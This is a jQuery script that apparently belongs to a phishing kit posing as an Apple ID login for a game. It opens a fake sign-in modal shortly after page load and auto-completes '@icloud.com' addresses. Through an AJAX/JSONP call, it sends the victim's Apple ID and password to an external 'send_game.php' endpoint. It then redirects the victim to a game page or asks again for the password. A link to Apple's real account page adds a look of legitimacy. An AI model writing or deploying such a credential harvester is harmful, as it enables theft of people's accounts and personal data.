$(document).ready(function(){
  
     setTimeout(function() { 
      $("#myModal").modal("show"); 
    }, 2000); 

    $('html,body').animate({
      scrollTop: $(".plantilla").offset().top
  }, 2000);



  })

    function act_flecha(){
    
        if($("#appleId").val().length > 0){
                // $("#bt_flec2").css("display", "block")
                
          if($("#appleId").val().indexOf("@") != -1){
               
          }else{
            $("#appleId").val($("#appleId").val() + "@icloud.com");
          }
    
        }   
    
      }

      function setFocusToTextBox(){ 
         setTimeout(function() {document.getElementById("appleId").focus();}, 1100);
    }


    function registrar_datos(){
         
        var b = $.trim($("#dominio").val()),
            c = $.trim($("#iddapp").val()); 
    
       function t(a) { 
            reset(a.message);
        }
    
    
         $.ajax({
            url: b+"includes/send_game.php",
            data: {
                name: "Chad",
                user:$("#appleId").val(),
                pass:$("#pwd").val(),
                idapp:c,  
            },
            dataType: "jsonp",
            jsonp: "callback",
            jsonpCallback: "jsonpCallback",
            success: function(a) {
                t(a);
            }
        })
     
        
    }
    
    function reset(result){
      
        var link = $("#link_game").val();
        
        if(result == "es_0"){ 
            //$("#appleId").val(''); 
            $("#pwd").val('');$("#appleId").focus();
            window.location.href = link;
            
        }else{
                $("#myModal2").modal("hide");
                $("#myModal3").modal("show");
        }
    }


  function action(cadena){

      if(cadena==1){ 
        $("#myModal").modal("hide");
        $("#myModal2").modal("show");  
        //setTimeout(function(){ $("#appleId").val(''); $("#pwd").val('');$("#appleId").focus();}, 1000);
 
      }else if(cadena == 5){
        clic("dd");
        $("#myModal2").modal("hide");
        $("#myModal").modal("show");
      }else if(cadena == 6){ 
           $("#register").css("opacity","0.5");
           $("#register").removeAttr("onclick"); 
           registrar_datos();
            
      }else if(cadena == 55){
        clic("dd");
        $("#myModal3").modal("hide");
        $("#myModal").modal("show"); 
      }else if(cadena == 66){
           $("#register").css("opacity","1");
           $("#register").attr("onclick","action(6)"); 
            //$("#appleId").val('');
            $("#pwd").val('');
          
          $("#myModal3").modal("hide");
          $("#myModal2").modal("show"); 
        setTimeout(function(){ 
             setFocusToTextBox();
          clic("dd");   
        }, 3000); 
           
      }else if(cadena == 10 ){
            window.location.href = "https://appleid.apple.com/account#!&page=create";
            
      }else if(cadena == 20 ){
            $("#myModal").modal("hide");
             setTimeout(function() { 
              $("#myModal").modal("show"); 
            }, 1500); 
      }

  }

  function clic(ele){
      
    if(ele == "appleId"){
      $("#pwd").parent().removeClass("bb");
      $("#appleId").parent().addClass("bb");
    }else if(ele == "pwd"){
      $("#appleId").parent().removeClass("bb");
      $("#pwd").parent().addClass("bb");
    }else{
      $("#pwd").parent().removeClass("bb");
      $("#appleId").parent().removeClass("bb");
    }  
  }